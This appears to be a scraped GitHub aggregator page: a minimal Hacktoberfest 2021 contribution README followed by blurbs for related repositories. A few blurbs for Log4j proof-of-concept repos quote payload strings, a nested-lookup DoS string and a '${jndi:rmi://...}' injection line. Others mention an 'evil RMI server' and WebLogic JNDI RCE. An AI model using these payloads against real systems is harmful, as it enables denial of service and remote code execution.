Hactoberfest 2021

Overview

Hactoberfest2021

U can add some usefull project file to this repository

Hacktoberfest 2021


Rules To Contribute To This Repo

  • Use any language.
  • C, C++, JAVA, Data Structure and Algorithms, HTML, CSS, Android Projects.
  • Anything valuable.

Steps For Contribution

Steps For Contribution

1. Fork this repo
2. Star this repo and follow the master
3. Add a file
4. commit the code
5. Make pull request

Thank You

You might also like...

source code of the live coding demo for "Building resilient and scalable API backends with Apache Pulsar and Spring Reactive" talk held at ApacheCon@Home 2021

reactive-iot-backend The is the source code of the live coding demo for "Building resilient and scalable API backends with Apache Pulsar and Spring Re

Jan 13, 2022

1002 ftc repo for the 2021 rr5 game

NOTICE This repository contains the public FTC SDK for the Freight Frenzy (2021-2022) competition season. Welcome! This GitHub repository contains the

Mar 14, 2022

Repository for FIRST Tech Challenge team 3916 Apex Robotics for the 2021-2022 game year (Freight Frenzy)

FTC Team 3916 - Apex Robotics This is our repo for the 2020-2021 game year - Ultimate Goal Installation Clone this repo. You can do this through the w

Nov 4, 2021

Concurrent Programming - 2021/2022 - Fall - LI51D - LI51N

s2122i-li51d-li51n Concurrent Programming - 2021/2022 - Fall - LI51D - LI51N See docs for documentation resources. See jvm for JVM-based code examples

Apr 8, 2022

Object Oriented Programming Course - Fall Semester 2021

Object Oriented Programming Course (Fall Semester 2021) This repository will store the code we use during the lectures and the exercises sessions of t

Jul 10, 2022

Log4j_dos_CVE-2021-45105

Log4j_dos_CVE-2021-45105

Log4j2 DOS (CVE-2021-45105) Poc ${${::-${::-$${::-$}}}} Versions Affected: all versions from 2.0-beta9 to 2.16.0 This application is based on Spring

Jul 22, 2022

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

CVE-2021-44228-Demo 利用 CVE-2021-44228,通过 RMI 和 LDAP 两种方式远程注入代码的示例。 Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex

Dec 14, 2021

log4j2 Log4Shell CVE-2021-44228 proof of concept

log4j2 Log4Shell CVE-2021-44228 proof of concept

Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a

Dec 21, 2021

JavaGuru - Java 1 - Tuesday (Autumn, 2021)

JavaGuru: Групповой Проект Java 1 Онлайн - Осень - Вторник - 2021 Привет! 👋 Данный документ содержит основную информацию о курсе. Предварительные тре

Jan 10, 2022

Repositório com conteúdo da disciplina Linguagem de Programação 2 de 2021.2 do IMD/UFRN

IMD0040 - LP2 Repositório contendo informações e arquivos da disciplina de Linguagem de Programação 2 (IMD0040) do IMD/UFRN ministrada pelo Prof. Gust

Dec 22, 2022

Programación de Servicios y Procesos - 03 Programación de comunicaciones en red. 2DAM. Curso 2021-2022

Programación de Servicios y Procesos - 03 Programación de comunicaciones en red. 2DAM. Curso 2021-2022

Programación de Servicios y Procesos - 03 Programación de comunicaciones en red Tema 03. Programación de comunicaciones en red. Curso 2021/2022. Conte

Dec 27, 2022

Entornos de Desarrollo - 05 Clean Code y TDD: Pruebas de Software. 1DAM. Curso 2021-2022.

Entornos de Desarrollo - 05 Clean Code y TDD: Pruebas de Software. 1DAM. Curso 2021-2022.

Entornos de Desarrollo - 04 Clean Code y TDD: Pruebas de Software Tema 05. Clean Code y TDD: Pruebas de Software. Curso 2021/2022. Contenidos Introduc

Nov 3, 2022

Programación - 03 Aplicación de Estructuras de Almacenamiento. 1DAM. Ejercicios realizados por el alumnado. Curso 2021-2022

Programación - 03 Aplicación de Estructuras de Almacenamiento. 1DAM. Ejercicios realizados por el alumnado. Curso 2021-2022

Programacion-03-Ejercicios-2021-2022 Programación - 03 Aplicación de Estructuras de Almacenamiento. 1DAM. Ejercicios realizados por el alumnado. Curso

Dec 27, 2022

Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability CVE-2021-22053

CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability Severity High Vendor Spring by VMware Description Application

Dec 16, 2022

Small example repo for looking into log4j CVE-2021-44228

log4j CVE-2021-44228 Lame useless repo to look into log4j CVE-2021-44228. Setup The repository contains a .idea/ folder which is a IntelliJ IDEA proje

Dec 13, 2022

Scan and patch tool for CVE-2021-44228 and related log4j concerns.

A Log4J2 CVE-2021-44228 Vulnerability Scanner and Patcher Links to download the latest version: Linux x64 with glibc2.17+ (RHEL7+) Windows & all other

Jun 1, 2022

My solution in Java for Advent of Code 2021.

 My solution in Java for Advent of Code 2021.

advent-of-code-2021 My solution in Java for Advent of Code 2021. What is Advent of Code? Advent of Code (AoC) is an Advent calendar of small programmi

Dec 2, 2021

A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).

MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4

Jan 4, 2022

An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228

evil-rmi-server An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228 in a local privesc scenario Build ./gradlew

Nov 9, 2022
Comments
  • Create OnlineTest.java

    Create OnlineTest.java

    Online Exam Project in Java Swing

    In this project, there are given 10 questions to play. User can bookmark any question for the reconsideration while going to result.

    We are using here java array to store the questions, options and answers not database. You can use collection framework or database in place of array.

    opened by pareshapraj 0
Owner
Kunal Debnath
Kunal Debnath
A simple and scalable Android bot emulation framework, as presented at Black Hat Europe 2021's Arsenal, as well as atHack 2021's Arsenal

m3 A simple and scalable Android bot emulation framework. A detailed explanation can be found here. This project was first published at Black Hat Euro

null 22 Aug 20, 2022
Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046

Log4j-HammerTime This Burp Suite Active Scanner extension validates exploitation of the Apache Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities

DXC Technology - StrikeForce 8 Jan 8, 2022
CVE-2021-2109 && Weblogic Server RCE via JNDI

Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected

Al1ex 29 Nov 21, 2022
A Minecraft Mod For TeaCon 2021

Source installation information for modders ------------------------------------------- This code follows the Minecraft Forge installation methodology

null 6 Sep 25, 2021
2021 Q2 全国联动黑客松大赛

2021Q2 Rebase Hackathon 黑客松获奖信息 一等奖 #12 Commitbale 0x44d04eF6E4d937A4AaA43e015f2f10c6380Edf7d tx: https://etherscan.io/tx/0x01534cd7c72fec380512830c36

Rebase Network 21 Nov 19, 2022
Training materials for NODES 2021 training on Neo4j Aura

NODES 2021: Neo4j Aura Training Event page: Hands-on with Neo4j Aura - NODES 2021 training series This repository contains the materials needed for th

null 17 Oct 30, 2021
openam-CVE-2021-35464 tomcat 执行命令回显

openam CVE-2021-35464 tomcat 执行命令回显. 项目基于 ysoserial 和 Java-Rce-Echo 构建项目需要在依赖中加入ysoserial.jar和jato-14.6.3.jar POST /OpenAM/ccversion/Version HTTP/1.1

Y4er 89 Dec 15, 2022
Source for the SpringOne 2021 Knative + Tekton lab

springone-2021-knative-tekton Source for the SpringOne 2021 Knative + Tekton lab See the slides for the main class content; in addition, if you want t

Evan Anderson 4 Apr 25, 2022
Programación de Servicios y Procesos - 01 Programación Multiproceso. 2DAM. Curso 2021-2022

Programación de Servicios y Procesos - 01 Programación Multiproceso Tema 01 Programación Multiproceso. Curso 2021/2022. Contenidos Concurrencia y Para

José Luis González Sánchez 15 Dec 27, 2022